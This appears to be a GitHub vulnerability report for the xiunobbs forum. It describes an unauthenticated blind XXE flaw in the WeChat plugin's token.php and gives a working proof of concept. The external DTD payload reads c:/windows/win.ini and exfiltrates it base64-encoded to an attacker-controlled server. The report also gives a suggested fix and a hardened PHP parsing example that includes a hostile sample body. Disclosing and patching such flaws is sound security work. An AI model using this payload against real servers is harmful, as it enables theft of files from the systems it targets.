
xiuno / xiunobbs

blind XXE in /xiunobbs/plugin/xn_wechat_public/route/token.php and no login

Open
c0d1M4x opened this issue

Code analysis

The XXE vulnerability is located in /plugin/xn_wechat_public/route/token.php, where the responseMsg function is called.

token.php

The responseMsg function is defined in /plugin/xn_wechat_public/model/wechat.class.php; it then calls simplexml_load_string, and the value of the incoming parameter is obtained through php://input. There are no restrictions on external file references.

wechat.class.php

Testing process

Testing found that /plugin/xn_wechat_public/route/token.php can be accessed directly without login, so we can send the POC directly to the server and get some content.

POC

POST /xiunobbs/plugin/xn_wechat_public/route/token.php HTTP/1.1
Host: 192.168.126.137
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 157

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://192.168.126.128:8000/getfile.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>

getfile.dtd

<!ENTITY % data SYSTEM "php://filter/read=convert.base64-encode/resource=c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://192.168.126.128:12345/?%data;'>">

We can use it to read any file in the system.

testing

send the POC

The attack server will receive the contents of the c:/windows/win.ini file.
win.ini

and decode it with base64

content


Comments (1)

c0d1M4x 2019-12-24 22:37

Resolve

Prohibit references to external entities
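One way to apply that fix in the parser the issue describes, shown as an added example that is not code from xiunobbs: the unsafe call shape beside a hardened replacement. The function names parse_unsafe and parse_wechat_xml and the sample message bodies are assumptions made for this example.

```php
<?php
// Added example, not xiunobbs code. parse_unsafe() mirrors the call shape
// the issue describes; parse_wechat_xml() is a hardened replacement.

// Unsafe: the raw request body is parsed with default options, so on
// builds where libxml still loads external entities, the DOCTYPE in the
// report is honoured and its parameter entities are fetched.
function parse_unsafe(string $body)
{
    return simplexml_load_string($body);
}

// Hardened: reject any DTD up front (a WeChat callback never carries one),
// forbid parser network access, and never pass LIBXML_NOENT, which would
// turn entity substitution on. PHP 8 / libxml 2.9+ already refuse to load
// external entities by default; the legacy switch covers older PHP.
function parse_wechat_xml(string $body): ?SimpleXMLElement
{
    if (stripos($body, '<!DOCTYPE') !== false) {
        return null;
    }
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $prev = libxml_use_internal_errors(true);
    $doc  = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NONET | LIBXML_NOCDATA);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    return $doc === false ? null : $doc;
}

// Constructed sample bodies (not taken from the report): a normal text
// message and a body with the DOCTYPE shape the issue shows.
$benign = '<xml><ToUserName><![CDATA[gh_demo]]></ToUserName>'
        . '<MsgType><![CDATA[text]]></MsgType>'
        . '<Content><![CDATA[hello]]></Content></xml>';
$hostile = '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % sp SYSTEM '
         . '"http://attacker.invalid/x.dtd">%sp;]><r>&exfil;</r>';

$msg = parse_wechat_xml($benign);
echo $msg === null ? "benign: rejected\n" : "benign: MsgType=" . $msg->MsgType . "\n";
echo parse_wechat_xml($hostile) === null ? "hostile: rejected\n" : "hostile: parsed\n";
```

The DOCTYPE check is the part that closes the blind variant as well: even a parser that never substitutes entities into the output can still fetch the external DTD unless the DTD is refused or LIBXML_NONET is set.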
